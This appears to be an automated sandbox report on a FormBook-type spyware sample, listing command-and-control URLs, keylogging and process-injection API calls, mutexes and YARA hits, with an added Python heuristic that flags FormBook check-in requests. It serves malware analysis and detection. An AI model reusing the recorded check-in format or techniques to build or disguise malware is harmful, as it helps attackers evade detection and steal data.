Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 10 Dec 2024 17:00:27 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66927002-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 10 Dec 2024 17:00:33 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66927002-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 10 Dec 2024 17:00:35 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66927002-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
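The four GET requests above share the shape the ETPRO "FormBook CnC Checkin (GET)" signature keys on: a short pseudo-random directory (/px6j/, /9ffw/, /d3gs/, /4nyz/), a query of exactly two parameters where one value is a long base64-like blob, Connection: close, and a hard-coded Chrome 40 / Windows 7 User-Agent, all sent to freshly registered domains. Below is an added example (not Joe Sandbox or Emerging Threats code) that scores raw HTTP requests against those traits; the thresholds are this editor's assumptions rather than the ETPRO rule's logic, the first sample request is rebuilt from the www.sunnyz.store GET on this page, and the benign request is constructed for contrast.

```python
"""Heuristic match for the FormBook HTTP check-in shape recorded in this
report. Added example; the regexes and thresholds are assumptions, not the
logic of Suricata SID 2855465."""
import re
from urllib.parse import urlsplit

PATH_RE = re.compile(r"^/[a-z0-9]{3,6}/$")          # e.g. /px6j/
BLOB_RE = re.compile(r"^[A-Za-z0-9+/]{60,}={0,2}$")  # long base64-like value


def parse_request(raw: str):
    """Split a raw request (CRLF-separated request line + headers) into
    (method, target, {lower-cased header name: value})."""
    lines = raw.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line:          # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def split_query(query: str):
    """Split a query string without percent/plus decoding: '+' and '/' are
    literal characters of the FormBook blob, so parse_qsl would mangle it."""
    pairs = []
    for item in query.split("&"):
        if item:
            key, _, value = item.partition("=")
            pairs.append((key, value))
    return pairs


def formbook_get_indicators(raw: str) -> list:
    """Return the FormBook-style traits present in one GET request."""
    method, target, headers = parse_request(raw)
    if method != "GET":
        return []
    reasons = []
    url = urlsplit(target)
    if PATH_RE.match(url.path):
        reasons.append(f"short random directory {url.path}")
    params = split_query(url.query)
    if len(params) == 2:
        short, long_ = sorted((v for _, v in params), key=len)
        if len(short) <= 16 and BLOB_RE.match(long_):
            reasons.append("two-parameter query: short id plus long base64-like blob")
    ua = headers.get("user-agent", "")
    if "Windows NT 6.1" in ua and re.search(r"Chrome/4\d\.", ua):
        reasons.append("hard-coded Chrome 4x on Windows 7 User-Agent")
    if headers.get("connection", "").lower() == "close":
        reasons.append("Connection: close on a browser-style GET")
    return reasons


def is_formbook_checkin(raw: str, min_hits: int = 3) -> bool:
    """Treat three or more traits as a match (assumed threshold)."""
    return len(formbook_get_indicators(raw)) >= min_hits


CRLF = "\r\n"
# Rebuilt from the www.sunnyz.store GET recorded in this report.
FORMBOOK_GET = CRLF.join([
    "GET /px6j/?PNE=e0RPRf4HVNE&66Sxjp=EbQ3Su7e0DOmvxBvG6i/QTj+RVb7/J5GOcC/Cv2Jtln7033mm9MhH2ssuuKAlvgFQYkR7TQ/BJkPMGurxzrKLb8lxYxVUxpwQ/Of0rti0wTIxJq6JAsDgXxJoFbzTbGnD1j7Uz133QdH HTTP/1.1",
    "Host: www.sunnyz.store",
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
    "Accept-Language: en-US,en;q=0.5",
    "Connection: close",
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36",
    "", "",
])
# Constructed benign request for contrast (not from the report).
BENIGN_GET = CRLF.join([
    "GET /search?q=formbook&lang=en HTTP/1.1",
    "Host: www.example.com",
    "Connection: keep-alive",
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36",
    "", "",
])

if __name__ == "__main__":
    for name, raw in (("formbook", FORMBOOK_GET), ("benign", BENIGN_GET)):
        print(name, is_formbook_checkin(raw), formbook_get_indicators(raw))
```

The query is split by hand on purpose: urllib's parse_qsl turns "+" into a space, which would break the base64-like check on exactly the parameter that matters. The heuristics are deliberately loose; in production they belong behind the domain-age and destination-reputation context the report's "IP address seen in connection with other malware" entries provide.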
Source: MA-DS-2024-03 URGENT.exe, 00000000.00000002.1287315581.0000000000B7C000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://54.244.188.177/
Source: MA-DS-2024-03 URGENT.exe, 00000000.00000002.1286891112.0000000000A81000.00000004.00000020.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000002.1286891112.0000000000AA5000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://54.244.188.177/usxsp
Source: MA-DS-2024-03 URGENT.exe, 00000000.00000002.1286891112.0000000000AA5000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://54.244.188.177/usxspa-t
Source: MA-DS-2024-03 URGENT.exe, 00000000.00000002.1287315581.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://54.244.188.177:80/usxsp
Source: fbLIkXRoMf.exe, 00000012.00000002.2505900550.000000000514B000.00000040.80000000.00040000.00000000.sdmp, String found in binary or memory: http://www.snyp.shop
Source: fbLIkXRoMf.exe, 00000012.00000002.2505900550.000000000514B000.00000040.80000000.00040000.00000000.sdmp, String found in binary or memory: http://www.snyp.shop/4nyz/
Source: choice.exe, 00000011.00000002.2506757530.00000000075B8000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: choice.exe, 00000011.00000002.2506757530.00000000075B8000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: choice.exe, 00000011.00000002.2506757530.00000000075B8000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: choice.exe, 00000011.00000002.2506757530.00000000075B8000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: choice.exe, 00000011.00000002.2506757530.00000000075B8000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: choice.exe, 00000011.00000002.2506757530.00000000075B8000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: choice.exe, 00000011.00000002.2506757530.00000000075B8000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: choice.exe, 00000011.00000002.2506611676.00000000072D0000.00000004.00000800.00020000.00000000.sdmp, choice.exe, 00000011.00000002.2505224111.00000000051E8000.00000004.10000000.00040000.00000000.sdmp, fbLIkXRoMf.exe, 00000012.00000002.2504606798.0000000003398000.00000004.00000001.00040000.00000000.sdmp, String found in binary or memory: https://hm.baidu.com/hm.js?74a9aceb7cac25dafa7a0b15cd8b5c9d
Source: choice.exe, 00000011.00000002.2500574105.00000000027D6000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: choice.exe, 00000011.00000002.2500574105.00000000027FB000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: choice.exe, 00000011.00000002.2500574105.00000000027D6000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: choice.exe, 00000011.00000002.2500574105.00000000027D6000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: choice.exe, 00000011.00000002.2500574105.00000000027D6000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: choice.exe, 00000011.00000002.2500574105.00000000027D6000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: choice.exe, 00000011.00000003.1970057439.000000000759F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: choice.exe, 00000011.00000002.2506611676.00000000072D0000.00000004.00000800.00020000.00000000.sdmp, choice.exe, 00000011.00000002.2505224111.00000000051E8000.00000004.10000000.00040000.00000000.sdmp, fbLIkXRoMf.exe, 00000012.00000002.2504606798.0000000003398000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://test-demo.eekxp.cn/123.html
                Source: choice.exe, 00000011.00000002.2505224111.0000000004EC4000.00000004.10000000.00040000.00000000.sdmp, choice.exe, 00000011.00000002.2506611676.00000000072D0000.00000004.00000800.00020000.00000000.sdmp, fbLIkXRoMf.exe, 00000012.00000002.2504606798.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2080181573.000000002CD34000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=sunnyz.store
                Source: choice.exe, 00000011.00000002.2506757530.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: choice.exe, 00000011.00000002.2505224111.0000000004EC4000.00000004.10000000.00040000.00000000.sdmp, choice.exe, 00000011.00000002.2506611676.00000000072D0000.00000004.00000800.00020000.00000000.sdmp, fbLIkXRoMf.exe, 00000012.00000002.2504606798.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2080181573.000000002CD34000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00474164
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_00473F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard | 0_2_00473F66
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_0046001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState | 0_2_0046001C
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_0048CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW | 0_2_0048CABC

                E-Banking Fraud

                Source: Yara match | File source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000004.00000002.1775163811.0000000003560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000011.00000002.2504438586.0000000004250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000011.00000002.2499870551.0000000002370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000012.00000002.2505900550.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.1774789087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.1775699573.0000000005200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000011.00000002.2504146589.0000000002930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000002.2504310648.0000000004220000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: This is a third-party compiled AutoIt script. | 0_2_00403B3A
                Source: MA-DS-2024-03 URGENT.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
                Source: MA-DS-2024-03 URGENT.exe, 00000000.00000000.1251149410.00000000004B4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_8e33dc8f-8
                Source: MA-DS-2024-03 URGENT.exe, 00000000.00000000.1251149410.00000000004B4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` | memstr_0b930c42-8
                Source: MA-DS-2024-03 URGENT.exe | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_cf53dd27-0
                Source: MA-DS-2024-03 URGENT.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` | memstr_f3dd4537-7
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0042CBC3 NtClose | 4_2_0042CBC3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03772B60 NtClose,LdrInitializeThunk | 4_2_03772B60
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk | 4_2_03772DF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03772C70 NtFreeVirtualMemory,LdrInitializeThunk | 4_2_03772C70
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037735C0 NtCreateMutant,LdrInitializeThunk | 4_2_037735C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03774340 NtSetContextThread | 4_2_03774340
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03774650 NtSuspendThread | 4_2_03774650
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03772BF0 NtAllocateVirtualMemory | 4_2_03772BF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03772BE0 NtQueryValueKey | 4_2_03772BE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03772BA0 NtEnumerateValueKey | 4_2_03772BA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03772B80 NtQueryInformationFile | 4_2_03772B80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03772AF0 NtWriteFile | 4_2_03772AF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03772AD0 NtReadFile | 4_2_03772AD0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03772AB0 NtWaitForSingleObject | 4_2_03772AB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03772F60 NtCreateProcessEx | 4_2_03772F60
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03772F30 NtCreateSection | 4_2_03772F30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03772FE0 NtCreateFile | 4_2_03772FE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03772FB0 NtResumeThread | 4_2_03772FB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03772FA0 NtQuerySection | 4_2_03772FA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03772F90 NtProtectVirtualMemory | 4_2_03772F90
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03772E30 NtWriteVirtualMemory | 4_2_03772E30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03772EE0 NtQueueApcThread | 4_2_03772EE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03772EA0 NtAdjustPrivilegesToken | 4_2_03772EA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03772E80 NtReadVirtualMemory | 4_2_03772E80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03772D30 NtUnmapViewOfSection | 4_2_03772D30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03772D10 NtMapViewOfSection | 4_2_03772D10
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03772D00 NtSetInformationFile | 4_2_03772D00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03772DD0 NtDelayExecution | 4_2_03772DD0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03772DB0 NtEnumerateKey | 4_2_03772DB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03772C60 NtCreateKey | 4_2_03772C60
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03772C00 NtQueryInformationProcess | 4_2_03772C00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03772CF0 NtOpenProcess | 4_2_03772CF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03772CC0 NtQueryVirtualMemory | 4_2_03772CC0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03772CA0 NtQueryInformationToken | 4_2_03772CA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03773010 NtOpenDirectoryObject | 4_2_03773010
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03773090 NtSetValueKey | 4_2_03773090
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037739B0 NtGetContextThread | 4_2_037739B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03773D70 NtOpenThread | 4_2_03773D70
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03773D10 NtOpenProcessToken | 4_2_03773D10
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_0046A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle | 0_2_0046A1EF
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_00458310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock | 0_2_00458310
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_004651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState | 0_2_004651BD
                Source: C:\Windows\System32\AppVClient.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\8e8aaae4f259d5dc.bin
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03775130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03787E54 appears 102 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0372B970 appears 277 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 037BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 037AEA12 appears 86 times
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: String function: 00407DE1 appears 35 times
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: String function: 00428900 appears 41 times
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: String function: 00420AE3 appears 70 times
                Source: MA-DS-2024-03 URGENT.exe, 00000000.00000003.1261097527.000000000434D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs MA-DS-2024-03 URGENT.exe
                Source: MA-DS-2024-03 URGENT.exe, 00000000.00000003.1262163325.00000000041A3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs MA-DS-2024-03 URGENT.exe
                Source: MA-DS-2024-03 URGENT.exe, 00000000.00000003.1253927861.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamearmsvc.exeN vs MA-DS-2024-03 URGENT.exe
                Source: MA-DS-2024-03 URGENT.exe, 00000000.00000003.1257763215.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameALG.exej% vs MA-DS-2024-03 URGENT.exe
                Source: unknown | Driver loaded: C:\Windows\System32\drivers\AppVStrm.sys
                Source: MA-DS-2024-03 URGENT.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: MA-DS-2024-03 URGENT.exe | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: armsvc.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: alg.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: AppVClient.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.0.dr | Static PE information: Section: .reloc ZLIB complexity 0.9893876745345744
Source: classification engine | Classification label: mal100.spre.troj.spyw.evad.winEXE@10/11@5/5
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_0046A06A GetLastError,FormatMessageW, 0_2_0046A06A
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_004581CB AdjustTokenPrivileges,CloseHandle, 0_2_004581CB
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_004587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_004587E1
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_0046B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_0046B333
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_0047EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_0047EE0D
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_0046C397 CoInitialize,CoCreateInstance,CoUninitialize, 0_2_0046C397
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_00404E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_00404E89
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_0169CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW, 0_2_0169CBD0
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | File created: C:\Users\user\AppData\Roaming\8e8aaae4f259d5dc.bin
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-8e8aaae4f259d5dc9e7986a9-b
Source: C:\Windows\System32\AppVClient.exe | Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-8e8aaae4f259d5dc9ea72c54-b
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-8e8aaae4f259d5dc-inf
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | File created: C:\Users\user~1\AppData\Local\Temp\autD77C.tmp
Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
